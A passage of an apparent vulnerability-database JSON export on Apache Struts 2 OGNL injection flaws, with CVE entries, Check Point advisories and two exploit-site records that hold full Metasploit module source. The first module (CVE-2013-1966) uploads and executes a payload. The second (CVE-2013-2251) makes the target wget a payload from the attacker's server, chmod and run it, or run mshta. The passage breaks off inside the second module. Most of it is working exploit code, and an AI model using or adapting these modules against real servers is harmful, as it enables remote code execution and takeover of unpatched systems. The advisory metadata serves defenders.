via\ninvalid input to a field.\n\n#### Bugs\n\n * <https://issues.apache.org/jira/browse/WW-3668>\n", "cvss3": {}, "published": "2012-03-02T00:00:00", "type": "ubuntucve", "title": "CVE-2012-0838", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0838"], "modified": "2012-03-02T00:00:00", "id": "UB:CVE-2012-0838", "href": "https://ubuntu.com/security/CVE-2012-0838", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-04T14:24:40", "description": "Apache Struts 2 before 2.3.14.2 allows remote attackers to execute\narbitrary OGNL code via a crafted request that is not properly handled when\nusing the includeParams attribute in the (1) URL or (2) A tag.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | per Debian, only affects Struts 2\n", "cvss3": {}, "published": "2013-07-10T00:00:00", "type": "ubuntucve", "title": "CVE-2013-1966", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1966"], "modified": "2013-07-10T00:00:00", "id": "UB:CVE-2013-1966", "href": "https://ubuntu.com/security/CVE-2013-1966", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-04T13:56:13", "description": "Apache Struts 2.x before 2.3.29 allows remote attackers to execute\narbitrary code via a \"%{}\" sequence in a tag attribute, aka forced double\nOGNL evaluation. NOTE: this vulnerability exists because of an incomplete\nfix for CVE-2016-0785.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-10-16T00:00:00", "type": "ubuntucve", "title": "CVE-2016-4461", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0785", "CVE-2016-4461"], "modified": "2017-10-16T00:00:00", "id": "UB:CVE-2016-4461", "href": "https://ubuntu.com/security/CVE-2016-4461", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T12:14:33", "description": "The url/a tags resolve every parameter passed to them, allowing arbitrary OGNL expressions encoded into the URL to be evaluated bypassing both Struts and OGNL library protections. Successful exploitation will allow an attacker to execute arbitrary commands in the context of the server.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2013-06-04T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts URL and Anchor tag includeParams OGNL Command Execution (CVE-2013-1966; CVE-2013-2115)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "modified": "2015-11-03T00:00:00", "id": "CPAI-2013-1859", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-02T18:43:30", "description": "A code execution vulnerability exists in Apache Struts OGNL.", "cvss3": {}, "published": "2013-08-20T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts Wildcard Matching OGNL Code Execution (CVE-2013-2134)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-2134"], "modified": "2022-08-02T00:00:00", "id": "CPAI-2013-2167", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-17T12:15:00", "description": "A Remote command execution vulnerability has been reported in Apache Struts. The vulnerability is due to a design flaw which allows attackers to manipulate parameters prefixed with action: redirect: redirectAction: .", "cvss3": {}, "published": "2013-07-25T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts Remote Command Execution (CVE-2013-2251)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251"], "modified": "2015-04-19T00:00:00", "id": "CPAI-2013-2507", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:50:04", "description": "A code execution vulnerability exists in Apache Struts Object-Graph Navigation Language (OGNL) expressions. The vulnerability is due to the failure of DefaultActionMapper to sanitize input following \"action:\", \"redirect:\" or \"redirectAction:\" expressions leading to code injection. A remote attacker could exploit this vulnerability by sending crafted HTTP requests to a server using a vulnerable version of the software. Successful exploitation will allow an attacker to execute arbitrary commands on the system.", "cvss3": {}, "published": "2015-05-18T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts Remote Command Execution - Ver2 (CVE-2013-2251)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251"], "modified": "2015-05-18T00:00:00", "id": "CPAI-2015-0737", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T12:37:11", "description": "Apache Struts2 is a free framework for building Java web-based applications. A command execution vulnerability has been reported in the web application framework Apache Struts2. The vulnerability is due to insufficient input validation in the ParametersInterceptor component when parsing incoming HTTP requests. A remote attacker can leverage this vulnerability by sending a crafted HTTP request to a target system. Successful exploitation of this vulnerability may allow the attacker to execute arbitrary commands on the affected system and may create a denial of service condition, causing the targeted web application to stop responding or enter into an error state.", "cvss3": {}, "published": "2010-08-11T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts2 ParametersInterceptor Remote Command Execution (CVE-2010-1870)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1870"], "modified": "2010-08-11T00:00:00", "id": "CPAI-2010-141", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-02T18:51:18", "description": "A script injection vulnerability has been reported in Apache Struts 2.", "cvss3": {}, "published": "2012-04-16T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts 2 ConversionErrorInterceptor OGNL Script Injection (CVE-2012-0391)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0391"], "modified": "2022-08-02T00:00:00", "id": "CPAI-2012-120", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-04-12T09:51:57", "description": "This Metasploit module exploits a remote command execution vulnerability in Apache Struts versions prior to 2.3.14.2. A specifically crafted request parameter can be used to inject arbitrary OGNL code into the stack bypassing Struts and OGNL library protections. When targeting an action which requires interaction through GET the payload should be split having into account the uri limits. In this case, if the rendered jsp has more than one point of injection, it could result in payload corruption. It should happen only when the payload is larger than the uri length.", "cvss3": {}, "published": "2013-06-03T00:00:00", "type": "zdt", "title": "Apache Struts includeParams Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "modified": "2013-06-03T00:00:00", "id": "1337DAY-ID-20837", "href": "https://0day.today/exploit/description/20837", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts includeParams Remote Code Execution',\r\n 'Description' => %q{\r\n This module exploits a remote command execution vulnerability in Apache Struts\r\n versions < 2.3.14.2. A specifically crafted request parameter can be used to inject\r\n arbitrary OGNL code into the stack bypassing Struts and OGNL library protections.\r\n When targeting an action which requires interaction through GET the payload should\r\n be split having into account the uri limits. In this case, if the rendered jsp has\r\n more than one point of injection, it could result in payload corruption. It should\r\n happen only when the payload is larger than the uri length.\r\n },\r\n 'Author' =>\r\n [\r\n # This vulnerability was also discovered by unknown members of:\r\n # 'Coverity security Research Laboratory'\r\n # 'NSFOCUS Security Team'\r\n 'Eric Kobrin', # Vulnerability Discovery\r\n 'Douglas Rodrigues', # Vulnerability Discovery\r\n 'Richard Hicks <scriptmonkey.blog[at]gmail.com>' # Metasploit Module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-2115'],\r\n [ 'CVE', '2013-1966'],\r\n [ 'OSVDB', '93645'],\r\n [ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-014'],\r\n [ 'URL', 'http://struts.apache.org/development/2.x/docs/s2-013.html']\r\n ],\r\n 'Platform' => [ 'win', 'linux', 'java'],\r\n 'Privileged' => true,\r\n 'Targets' =>\r\n [\r\n ['Windows Universal',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n ['Linux Universal',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'linux'\r\n }\r\n ],\r\n [ 'Java Universal',\r\n {\r\n 'Arch' => ARCH_JAVA,\r\n 'Platform' => 'java'\r\n },\r\n ]\r\n ],\r\n 'DisclosureDate' => 'May 24 2013',\r\n 'DefaultTarget' => 2))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('PARAMETER',[ true, 'The parameter to use for the exploit (does not have to be an expected one).',rand_text_alpha_lower(4)]),\r\n OptString.new('TARGETURI', [ true, 'The path to a vulnerable struts application action', \"/struts2-blank/example/HelloWorld.action\"]),\r\n OptEnum.new('HTTPMETHOD', [ true, 'Which HTTP Method to use, GET or POST','POST', ['GET','POST']]),\r\n OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])\r\n ], self.class)\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n inject_string = @inject.gsub(/CMD/,cmd)\r\n uri = normalize_uri(target_uri.path)\r\n req_hash = {'uri' => uri, 'version' => '1.1', 'method' => datastore['HTTPMETHOD'] }\r\n case datastore['HTTPMETHOD']\r\n when 'POST'\r\n req_hash.merge!({ 'vars_post' => { datastore['PARAMETER'] => inject_string }})\r\n when 'GET'\r\n req_hash.merge!({ 'vars_get' => { datastore['PARAMETER'] => inject_string }})\r\n end\r\n\r\n # Display a nice \"progress bar\" instead of message spam\r\n case @notify_flag\r\n when 0\r\n print_status(\"Performing HTTP #{datastore['HTTPMETHOD']} requests to upload payload\")\r\n @notify_flag = 1\r\n when 1\r\n print(\".\") # Progress dots\r\n when 2\r\n print_status(\"Payload upload complete\")\r\n end\r\n\r\n return send_request_cgi(req_hash) #Used for check function.\r\n end\r\n\r\n def exploit\r\n #initialise some base vars\r\n @inject = \"${#_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,CMD}\"\r\n @java_upload_part_cmd = \"#f=new java.io.FileOutputStream('FILENAME',APPEND),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('BUFFER')), #f.close()\"\r\n #Set up generic values.\r\n @payload_exe = rand_text_alphanumeric(4+rand(4))\r\n pl_exe = generate_payload_exe\r\n append = false\r\n #Now arch specific...\r\n case target['Platform']\r\n when 'linux'\r\n @payload_exe = \"/tmp/#{@payload_exe}\"\r\n chmod_cmd = \"@[email\u00a0protected]().exec(\\\"/bin/sh_-c_chmod +x #{@payload_exe}\\\".split(\\\"_\\\"))\"\r\n exec_cmd = \"@[email\u00a0protected]().exec(\\\"/bin/sh_-c_#{@payload_exe}\\\".split(\\\"_\\\"))\"\r\n when 'java'\r\n @payload_exe << \".jar\"\r\n pl_exe = payload.encoded_jar.pack\r\n exec_cmd = \"\"\r\n exec_cmd << \"#[email\u00a0protected]@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),\"\r\n exec_cmd << \"#q.setAccessible(true),#q.set(null,true),\"\r\n exec_cmd << \"#[email\u00a0protected]@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),\"\r\n exec_cmd << \"#q.setAccessible(true),#q.set(null,false),\"\r\n exec_cmd << \"#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),\"\r\n exec_cmd << \"#c=#cl.loadClass('metasploit.Payload'),\"\r\n exec_cmd << \"#c.getMethod('main',new java.lang.Class[]{@[email\u00a0protected]('[Ljava.lang.String;')}).invoke(\"\r\n exec_cmd << \"null,new java.lang.Object[]{new java.lang.String[0]})\"\r\n when 'windows'\r\n @payload_exe = \"./#{@payload_exe}.exe\"\r\n exec_cmd = \"@[email\u00a0protected]().exec('#{@payload_exe}')\"\r\n else\r\n fail_with(Exploit::Failure::NoTarget, 'Unsupported target platform!')\r\n end\r\n\r\n print_status(\"Preparing payload...\")\r\n # Now with all the arch specific stuff set, perform the upload.\r\n # Need to calculate amount to allocate for non-dynamic parts of the URL.\r\n # Fixed strings are tokens used for substitutions.\r\n append_length = append ? \"true\".length : \"false\".length # Gets around the boolean/string issue\r\n sub_from_chunk = append_length + ( @java_upload_part_cmd.length - \"FILENAME\".length - \"APPEND\".length - \"BUFFER\".length )\r\n sub_from_chunk += ( @inject.length - \"CMD\".length ) + @payload_exe.length + normalize_uri(target_uri.path).length + datastore['PARAMETER'].length\r\n case datastore['HTTPMETHOD']\r\n when 'GET'\r\n chunk_length = 2048 - sub_from_chunk # Using the max request length of 2048 for IIS, subtract all the \"static\" URL items.\r\n #This lets us know the length remaining for our base64'd payloads\r\n chunk_length = ((chunk_length/4).floor)*3\r\n when 'POST'\r\n chunk_length = 65535 # Just set this to an arbitrarily large value, as its a post request we don't care about the size of the URL anymore.\r\n end\r\n @notify_flag = 0\r\n while pl_exe.length > chunk_length\r\n java_upload_part(pl_exe[0,chunk_length],@payload_exe,append)\r\n pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length]\r\n append = true\r\n end\r\n java_upload_part(pl_exe,@payload_exe,append)\r\n execute_command(chmod_cmd) if target['Platform'] == 'linux'\r\n print_line() # new line character, after progress bar.\r\n @notify_flag = 2 # upload is complete, next command we're going to execute the uploaded file.\r\n execute_command(exec_cmd)\r\n register_files_for_cleanup(@payload_exe)\r\n end\r\n\r\n def java_upload_part(part, filename, append = false)\r\n cmd = @java_upload_part_cmd.gsub(/FILENAME/,filename)\r\n append = append ? \"true\" : \"false\" # converted for the string replacement.\r\n cmd = cmd.gsub!(/APPEND/,append)\r\n cmd = cmd.gsub!(/BUFFER/,Rex::Text.encode_base64(part))\r\n execute_command(cmd)\r\n end\r\n\r\n def check\r\n #initialise some base vars\r\n @inject = \"${#_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,CMD}\"\r\n print_status(\"Performing Check...\")\r\n sleep_time = datastore['CHECK_SLEEPTIME']\r\n check_cmd = \"@[email\u00a0protected](#{sleep_time * 1000})\"\r\n t1 = Time.now\r\n print_status(\"Asking remote server to sleep for #{sleep_time} seconds\")\r\n response = execute_command(check_cmd)\r\n t2 = Time.now\r\n delta = t2 - t1\r\n\r\n\r\n if response.nil?\r\n return Exploit::CheckCode::Safe\r\n elsif delta < sleep_time\r\n return Exploit::CheckCode::Safe\r\n else\r\n return Exploit::CheckCode::Appears\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2018-04-12] #", "sourceHref": "https://0day.today/exploit/20837", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-13T03:42:50", "description": "The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with \"action:\" or \"redirect:\", followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms. In Struts 2 before 2.3.15.1 the information following \"action:\", \"redirect:\" or \"redirectAction:\" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code. This Metasploit module has been tested successfully on Struts 2.3.15 over Tomcat 7, with Windows 2003 SP2 and Ubuntu 10.04 operating systems.", "cvss3": {}, "published": "2013-07-26T00:00:00", "type": "zdt", "title": "Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-2251"], "modified": "2013-07-26T00:00:00", "id": "1337DAY-ID-21032", "href": "https://0day.today/exploit/description/21032", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::HttpServer\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution',\r\n 'Description' => %q{\r\n The Struts 2 DefaultActionMapper supports a method for short-circuit navigation\r\n state changes by prefixing parameters with \"action:\" or \"redirect:\", followed by\r\n a desired navigational target expression. This mechanism was intended to help with\r\n attaching navigational information to buttons within forms.\r\n\r\n In Struts 2 before 2.3.15.1 the information following \"action:\", \"redirect:\" or\r\n \"redirectAction:\" is not properly sanitized. Since said information will be\r\n evaluated as OGNL expression against the value stack, this introduces the\r\n possibility to inject server side code.\r\n\r\n This module has been tested successfully on Struts 2.3.15 over Tomcat 7, with\r\n Windows 2003 SP2 and Ubuntu 10.04 operating systems.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Takeshi Terada', # Vulnerability discovery\r\n 'sinn3r', # Metasploit module\r\n 'juan vazquez' # Metasploit modules\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-2251' ],\r\n [ 'OSVDB', '95405' ],\r\n [ 'BID', '61189' ],\r\n [ 'URL', 'http://struts.apache.org/release/2.3.x/docs/s2-016.html' ]\r\n ],\r\n 'Platform' => [ 'win', 'linux'],\r\n 'Targets' =>\r\n [\r\n ['Automatic', {}],\r\n ['Windows',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n ['Linux',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'linux'\r\n }\r\n ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'WfsDelay' => 10\r\n },\r\n 'Stance' => Msf::Exploit::Stance::Aggressive,\r\n 'DisclosureDate' => 'Jul 2 2013',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('TARGETURI', [true, 'Action URI', '/struts2-blank/example/HelloWorld.action']),\r\n OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 60]),\r\n # It isn't OptPath becuase it's a *remote* path\r\n OptString.new(\"WritableDir\", [ true, \"A directory where we can write files (only on Linux targets)\", \"/tmp\" ])\r\n ], self.class)\r\n end\r\n\r\n def on_new_session(session)\r\n if session.type == \"meterpreter\"\r\n session.core.use(\"stdapi\") unless session.ext.aliases.include?(\"stdapi\")\r\n end\r\n\r\n @dropped_files.delete_if do |file|\r\n false unless file =~ /\\.exe/\r\n win_file = file.gsub(\"/\", \"\\\\\\\\\")\r\n if session.type == \"meterpreter\"\r\n begin\r\n wintemp = session.fs.file.expand_path(\"%TEMP%\")\r\n win_file = \"#{wintemp}\\\\#{win_file}\"\r\n session.shell_command_token(%Q|attrib.exe -r \"#{win_file}\"|)\r\n session.fs.file.rm(win_file)\r\n print_good(\"Deleted #{file}\")\r\n true\r\n rescue ::Rex::Post::Meterpreter::RequestError\r\n print_error(\"Failed to delete #{win_file}\")\r\n false\r\n end\r\n end\r\n end\r\n\r\n super\r\n end\r\n\r\n def start_http_service\r\n #do not use SSL\r\n if datastore['SSL']\r\n ssl_restore = true\r\n datastore['SSL'] = false\r\n end\r\n\r\n if (datastore['SRVHOST'] == \"0.0.0.0\" or datastore['SRVHOST'] == \"::\")\r\n srv_host = Rex::Socket.source_address(rhost)\r\n else\r\n srv_host = datastore['SRVHOST']\r\n end\r\n\r\n service_url = srv_host + ':' + datastore['SRVPORT'].to_s\r\n print_status(\"#{rhost}:#{rport} - Starting up our web service on #{service_url} ...\")\r\n start_service({\r\n 'Uri' => {\r\n 'Proc' => Proc.new { |cli, req|\r\n on_request_uri(cli, req)\r\n },\r\n 'Path' => '/'\r\n }\r\n })\r\n\r\n datastore['SSL'] = true if ssl_restore\r\n\r\n return service_url\r\n end\r\n\r\n def check\r\n uri = normalize_uri(target_uri.path)\r\n res = send_request_cgi({\r\n 'uri' => uri,\r\n 'method' => 'GET'\r\n })\r\n\r\n if res.nil? or res.code != 200\r\n print_error(\"#{rhost}:#{rport} - Check needs a valid action, returning 200, as TARGETURI\")\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n proof = rand_text_alpha(6 + rand(4))\r\n\r\n res = send_request_cgi({\r\n 'uri' => \"#{uri}?redirect:%25{new%20java.lang.String('#{proof}')}\",\r\n 'method' => 'GET'\r\n })\r\n\r\n if res and res.code == 302 and res.headers['Location'] =~ /#{proof}/\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n def auto_target\r\n uri = normalize_uri(target_uri.path)\r\n res = send_request_cgi({\r\n 'uri' => uri,\r\n 'method' => 'GET'\r\n })\r\n\r\n if res.nil? or res.code != 200\r\n fail_with(Exploit::Failure::NoTarget, \"#{rhost}:#{rport} - In order to autodetect, a valid action, returning 200, must be provided as TARGETURI, returning 200\")\r\n end\r\n\r\n proof = rand_text_alpha(6 + rand(4))\r\n\r\n res = send_request_cgi({\r\n 'uri' => \"#{uri}?redirect:%25{new%20java.io.File('.').getCanonicalPath().concat('#{proof}')}\",\r\n 'method' => 'GET'\r\n })\r\n\r\n if res and res.code == 302 and res.headers['Location'] =~ /#{proof}/\r\n if res.headers['Location'] =~ /:\\\\/\r\n return targets[1] # Windows\r\n else\r\n return targets[2] # Linux\r\n end\r\n end\r\n\r\n fail_with(Exploit::Failure::NoTarget, \"#{rhost}:#{rport} - Target auto-detection didn't work\")\r\n\r\n end\r\n\r\n def exploit_linux\r\n\r\n downfile = rand_text_alpha(8+rand(8))\r\n @pl = @exe\r\n @pl_sent = false\r\n\r\n #\r\n # start HTTP service if necessary\r\n #\r\n service_url = start_http_service\r\n\r\n #\r\n # download payload\r\n #\r\n fname = datastore['WritableDir']\r\n fname = \"#{fname}/\" unless fname =~ %r'/$'\r\n fname << downfile\r\n uri = normalize_uri(target_uri.path)\r\n uri << \"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'wget','#{service_url}','-O',new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f')})).start()}\"\r\n\r\n print_status(\"#{rhost}:#{rport} - Downloading payload to #{fname}...\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n })\r\n\r\n if res.nil? or res.code != 302\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\r\n end\r\n\r\n #\r\n # wait for payload download\r\n #\r\n wait_payload\r\n\r\n register_file_for_cleanup(fname)\r\n\r\n #\r\n # chmod\r\n #\r\n uri = normalize_uri(target_uri.path)\r\n uri << \"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'chmod','777',new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f')})).start()}\"\r\n\r\n print_status(\"#{rhost}:#{rport} - Make payload executable...\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n })\r\n\r\n if res.nil? or res.code != 302\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\r\n end\r\n\r\n #\r\n # execute\r\n #\r\n uri = normalize_uri(target_uri.path)\r\n uri << \"?redirect:%25{(new%20java.lang.ProcessBuilder(new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f'))).start()}\"\r\n\r\n print_status(\"#{rhost}:#{rport} - Execute payload...\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n })\r\n\r\n if res.nil? or res.code != 302\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\r\n end\r\n\r\n end\r\n\r\n def exploit_windows\r\n @var_exename = rand_text_alpha(4 + rand(4)) + '.exe'\r\n @pl = build_hta\r\n @pl_sent = false\r\n\r\n #\r\n # start HTTP service if necessary\r\n #\r\n service_url = start_http_service\r\n\r\n #\r\n # execute hta\r\n #\r\n uri = normalize_uri(target_uri.path)\r\n uri << \"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'mshta',new%20java.lang.String('http:nn#{service_url}').replace('n','\\\\u002f')})).start()}\"\r\n\r\n print_status(\"#{rhost}:#{rport} - Execute payload through malicious HTA...\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n })\r\n\r\n if res.nil? or res.code != 302\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\r\n end\r\n\r\n #\r\n # wait for payload download\r\n #\r\n wait_payload\r\n\r\n register_file_for_cleanup(@var_exename)\r\n end\r\n\r\n def exploit\r\n if target.name =~ /Automatic/\r\n print_status(\"#{rhost}:#{rport} - Target autodetection...\")\r\n my_target = auto_target\r\n print_good(\"#{rhost}:#{rport} - #{my_target.name} target found!\")\r\n else\r\n my_target = target\r\n end\r\n\r\n p = exploit_regenerate_payload(my_target.platform, my_target.arch)\r\n @exe = 